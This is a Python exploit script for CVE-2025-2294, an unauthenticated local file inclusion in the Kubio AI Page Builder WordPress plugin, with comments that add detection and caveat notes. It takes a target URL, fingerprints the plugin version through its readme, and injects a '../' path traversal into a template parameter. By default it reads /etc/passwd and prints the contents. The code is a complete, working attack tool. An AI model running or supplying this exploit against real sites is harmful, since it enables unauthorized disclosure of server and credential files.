import requests
import argparse
import time
# Silence urllib3's warnings first; the insecure-request warning would
# otherwise be printed for every call made with verification turned off.
requests.packages.urllib3.disable_warnings()

# One shared session for all requests made by this script.
session = requests.Session()
# TLS certificate validation is disabled for the whole session, so the
# server's identity is never checked: any response read through this
# session may come from, or have been altered by, a party in the network
# path. Output of this script is therefore not trustworthy evidence on
# its own.
session.verify = False
# ASCII-art banner with the author credit; printed once by the
# ``__main__`` block before argument parsing.
banner = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@! @@@ @@!@!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@! @!@ !@!!@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ !!@!!@!! @!! @!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!@!!! !!! !@!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! !!! :!!:!:!!:
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! !:::!!:::
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::::: :: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: : : : :::
By: Nxploited | Khaled Alenazi
"""
def fetch_readme(url):
    """Download the Kubio plugin's ``readme.txt`` from a WordPress site.

    The request goes to ``{url}/wp-content/plugins/kubio/readme.txt`` through
    the module-level ``session`` with a 10-second timeout. In web-server
    access logs this shows up as a plain GET for the plugin readme.

    Args:
        url: Base URL of the site, without a trailing slash.

    Returns:
        The response body as text, or ``None`` when the request fails or the
        server answers with an error status (a message is printed in both
        cases).
    """
    readme_url = f"{url}/wp-content/plugins/kubio/readme.txt"
    try:
        reply = session.get(readme_url, timeout=10)
        # Turn 4xx/5xx answers into requests.HTTPError so they are reported
        # below instead of being returned as readme text.
        reply.raise_for_status()
        return reply.text
    except requests.HTTPError as http_err:
        print(f"[-] HTTP error occurred: {http_err}")
    except requests.RequestException as req_err:
        print(f"[-] Request error occurred: {req_err}")
    # Only reached after one of the handlers above has printed its message.
    return None
def is_vulnerable(readme_content):
    """Decide from readme text whether the plugin version is 2.5.1 or lower.

    Only the first line containing ``Stable tag:`` is considered. The text
    after the last colon on that line is split on dots; a version is
    compared only when it has exactly three components.

    The readme is just a hint about the installed version: a ``False``
    result also covers a missing tag or a tag that is not in three-part
    form, so it is not evidence that a site is patched.

    Args:
        readme_content: Full text of the plugin's ``readme.txt``.

    Returns:
        ``True`` when the stable tag is a three-part version at or below
        2.5.1 (after printing a message and pausing three seconds),
        otherwise ``False``.

    Raises:
        ValueError: If a three-part stable tag has a non-integer component.
    """
    for entry in readme_content.splitlines():
        if "Stable tag:" not in entry:
            continue

        # Everything after the last colon is taken as the version string.
        fields = entry.split(":")[-1].strip().split(".")
        if len(fields) != 3:
            # The first "Stable tag:" line decides; later lines are ignored.
            return False

        major, minor, patch = (int(field) for field in fields)
        if (major, minor, patch) > (2, 5, 1):
            return False

        print("[+] Target is vulnerable. Exploiting...")
        time.sleep(3)
        return True

    return False
def build_exploit_url(url, target_file):
    """Compose the front-page URL that carries the two Kubio preview parameters.

    The query string sets ``__kubio-site-edit-iframe-preview=1`` and passes
    ``target_file`` as ``__kubio-site-edit-iframe-classic-template``. That
    parameter pair, particularly with ``../`` sequences in the template
    value, is the request pattern to search for in access logs or to block
    at a web application firewall.

    Args:
        url: Base URL of the site, without a trailing slash.
        target_file: Value placed in the template parameter; it is inserted
            as given, with no URL encoding.

    Returns:
        The assembled URL as a string.
    """
    preview_flag = "__kubio-site-edit-iframe-preview=1"
    template_param = f"__kubio-site-edit-iframe-classic-template={target_file}"
    return f"{url}/?{preview_flag}&{template_param}"
def send_exploit_request(full_url):
    """GET ``full_url`` through the shared session and return the body text.

    Uses a 10-second timeout. Certificate handling is whatever the
    module-level ``session`` is configured with.

    Args:
        full_url: Complete URL to request.

    Returns:
        The response body as text, or ``None`` when the request fails or the
        server answers with an error status (a message is printed in both
        cases).
    """
    try:
        reply = session.get(full_url, timeout=10)
        # 4xx/5xx answers become requests.HTTPError and are reported below.
        reply.raise_for_status()
        return reply.text
    except requests.HTTPError as http_err:
        print(f"[-] HTTP error occurred: {http_err}")
    except requests.RequestException as req_err:
        print(f"[-] Request error occurred: {req_err}")
    # Only reached after one of the handlers above has printed its message.
    return None
def display_result(content):
    """Print the response body, or a failure line when there is none.

    The check is truthiness only: any non-empty body is reported as a
    success, including an ordinary HTML page returned by a site that did
    not include the requested file. The "successful" message is therefore
    not proof that a file was disclosed; the printed content has to be
    inspected.

    Args:
        content: Response text, or ``None``/empty when nothing was returned.
    """
    if not content:
        print("[-] Exploit failed or file not readable.")
        return

    print("[+] Exploit successful. File content:")
    print(content)
def exploit(target_url, file_to_read):
    """Run the version check and, if it passes, the file-read request.

    Sequence: fetch the plugin readme, test its stable tag with
    ``is_vulnerable``, then build the request URL, send it and print the
    outcome. The second request is only made when the readme was retrieved
    and its version check returned ``True``.

    Args:
        target_url: Base URL of the site, without a trailing slash.
        file_to_read: Path passed on as the template parameter value.
    """
    readme = fetch_readme(target_url)
    # Same short-circuit as the original: the version check is skipped when
    # no readme text came back.
    if not (readme and is_vulnerable(readme)):
        print("[-] Target is not vulnerable or readme.txt not accessible.")
        return

    request_url = build_exploit_url(target_url, file_to_read)
    body = send_exploit_request(request_url)
    display_result(body)
if __name__ == "__main__":
    # Command-line entry point: print the banner, read -u/--url and
    # -f/--file, then hand both to exploit().
    print(banner)

    cli = argparse.ArgumentParser(
        description="Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi",
    )
    cli.add_argument(
        "-u",
        "--url",
        required=True,
        help="Target base URL (e.g., https://example.com)",
    )
    # The default is a relative "../" traversal path, not the absolute
    # /etc/passwd that the help text mentions.
    cli.add_argument(
        "-f",
        "--file",
        default="../../../../../../../../etc/passwd",
        help="File to read (default: /etc/passwd)",
    )
    options = cli.parse_args()

    # Drop trailing slashes so the URL builders do not emit "//".
    base_url = options.url.rstrip("/")
    exploit(base_url, options.file)